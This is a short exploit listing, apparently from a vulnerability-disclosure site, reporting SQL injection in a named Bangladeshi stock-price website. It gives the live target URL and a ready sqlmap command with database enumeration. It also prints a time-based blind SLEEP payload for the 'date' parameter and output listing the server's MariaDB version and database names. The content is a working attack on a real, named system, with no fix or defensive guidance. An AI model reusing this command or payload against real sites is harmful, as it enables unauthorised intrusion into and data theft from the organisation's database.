Pricelist Stock Bangladesh Ltd. Center For Financial Analysis | SQL Injection Vulnerability

2021.09.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Pricelist Stock Bangladesh Ltd. Center For Financial Analysis | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "https://stockbangladesh.mobi/trade_details.php?id=2023163&date=2021-08-02&cmp=62" --dbs --banner --batch --------------------------------------------------------------------------------------------------- .mobi Mobile. It is used in website construction for mobile phones. Pricelist Stock Bangladesh Ltd. Center For Financial Analysis https://stockbangladesh.mobi/trade_details.php?id=2023163&date=2021-08-02&cmp=62 --- Parameter: date (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=2023163&date=2021-08-02' AND (SELECT 2269 FROM (SELECT(SLEEP(5)))muJs) AND 'OBPY'='OBPY&cmp=62 --- the back-end DBMS is MySQL web application technology: Apache, PHP back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) banner: '10.3.31-MariaDB' available databases [2]: [+] information_schema [+] stock_sbnew

References:

0x01369


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top